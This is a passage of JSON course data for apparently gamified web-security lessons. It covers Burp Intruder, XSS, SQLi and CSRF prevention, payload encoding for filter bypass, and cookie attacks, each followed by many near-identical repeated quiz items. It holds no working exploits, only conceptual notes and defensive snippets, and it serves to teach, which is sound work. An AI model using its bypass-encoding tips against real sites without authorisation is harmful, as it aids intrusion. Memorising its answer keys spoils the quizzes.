restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-burp-intruder","cat":"Web Application","title":"Burp Intruder Attack Types","diff":2,"xp":150,"intro":"Sniper, Battering Ram, Pitchfork, Cluster Bomb.","sections":[{"type":"text","content":"Sniper, Battering Ram, Pitchfork, Cluster Bomb."},{"type":"code","lang":"bash","content":"# Sniper: one position at a time\n# Battering Ram: same payload all positions\n# Pitchfork: parallel payload lists\n# Cluster Bomb: all combinations"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Cluster Bomb tests...","opts":["One position","All combinations of payloads across positions","Same payload everywhere","Parallel lists"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-burp-extensions","cat":"Web Application","title":"Burp Suite Extensions","diff":2,"xp":150,"intro":"Extend Burp with community tools.","sections":[{"type":"text","content":"Extend Burp with community tools."},{"type":"code","lang":"bash","content":"# Key extensions:\n# Logger++: enhanced logging\n# Autorize: auth testing\n# JSON Web Tokens: JWT manipulation\n# Active Scan++: better scanning\n# Hackvertor: encoding/decoding"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Autorize extension tests for...","opts":["XSS","Authorization bypass (IDOR/access control)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-xss-prevention","cat":"Web Application","title":"XSS Prevention Techniques","diff":1,"xp":75,"intro":"How to properly prevent cross-site scripting.","sections":[{"type":"text","content":"How to properly prevent cross-site scripting."},{"type":"code","lang":"bash","content":"# Output encoding (context-dependent):\n# HTML: &lt; &gt; &amp; &quot; &#x27;\n# JavaScript: x3c x3e\n# URL: %3C %3E\n# CSS: 003C\n# Plus: CSP header, HttpOnly cookies"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"The most important XSS prevention is...","opts":["Input validation alone","Context-dependent output encoding","WAF","Antivirus"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-sqli-prevention","cat":"Web Application","title":"SQL Injection Prevention","diff":1,"xp":75,"intro":"Parameterized queries prevent all SQL injection.","sections":[{"type":"text","content":"Parameterized queries prevent all SQL injection."},{"type":"code","lang":"bash","content":"# BAD:\nquery = \"SELECT * FROM users WHERE id = \" + user_input\n# GOOD (parameterized):\ncursor.execute(\"SELECT * FROM users WHERE id = ?\", (user_input,))\n# Or prepared statements in any language"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Parameterized queries prevent SQLi by...","opts":["Encoding input","Separating code from data (input is never interpreted as SQL)","Blocking special chars","Limiting input length"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-csrf-prevention","cat":"Web Application","title":"CSRF Prevention","diff":1,"xp":75,"intro":"Anti-CSRF tokens, SameSite cookies, and Referer checking.","sections":[{"type":"text","content":"Anti-CSRF tokens, SameSite cookies, and Referer checking."},{"type":"code","lang":"bash","content":"# Anti-CSRF token: random value tied to session\n# Include in form: <input type='hidden' name='csrf' value='random'>\n# Verify server-side: if(request.csrf != session.csrf) reject()\n# SameSite cookie: Set-Cookie: session=abc; SameSite=Strict"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SameSite=Strict cookies...","opts":["Are sent with all requests","Are only sent with same-site requests (blocks CSRF)","Are encrypted","Are deleted on close"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-encoding-types","cat":"Web Application","title":"Encoding for Web Attacks","diff":2,"xp":150,"intro":"URL, HTML, Base64, Unicode encoding for payloads.","sections":[{"type":"text","content":"URL, HTML, Base64, Unicode encoding for payloads."},{"type":"code","lang":"bash","content":"# URL encoding: < = %3C  > = %3E\n# Double URL: %3C = %253C\n# HTML entities: < = &lt;  > = &gt;\n# Unicode: < = \\u003c  > = \\u003e\n# Base64: encode entire payload"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Double URL encoding bypasses filters that...","opts":["Block everything","Decode only once","Use strong encryption","Log all traffic"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-error-handling","cat":"Web Application","title":"Verbose Error Exploitation","diff":1,"xp":75,"intro":"Detailed error messages reveal internal information.","sections":[{"type":"text","content":"Detailed error messages reveal internal information."},{"type":"code","lang":"bash","content":"# Stack traces reveal: framework, library versions, file paths\n# Database errors reveal: query structure, table names\n# PHP errors reveal: file paths, function names\n# Custom error pages hide this information"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Verbose errors are dangerous because they reveal...","opts":["Nothing useful","Internal paths, versions, and query structure","User passwords","Network topology"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-cookie-attacks","cat":"Web Application","title":"Cookie Security Attacks","diff":2,"xp":150,"intro":"Exploit insecure cookies for session hijacking.","sections":[{"type":"text","content":"Exploit insecure cookies for session hijacking."},{"type":"code","lang":"bash","content":"# Missing Secure flag: cookie sent over HTTP (interceptable)\n# Missing HttpOnly: accessible via JavaScript (stealable via XSS)\n# Missing SameSite: vulnerable to CSRF\n# Predictable values: session fixation/prediction"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HttpOnly flag prevents...","opts":["All cookie theft","JavaScript access to the cookie","Network interception","CSRF"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS 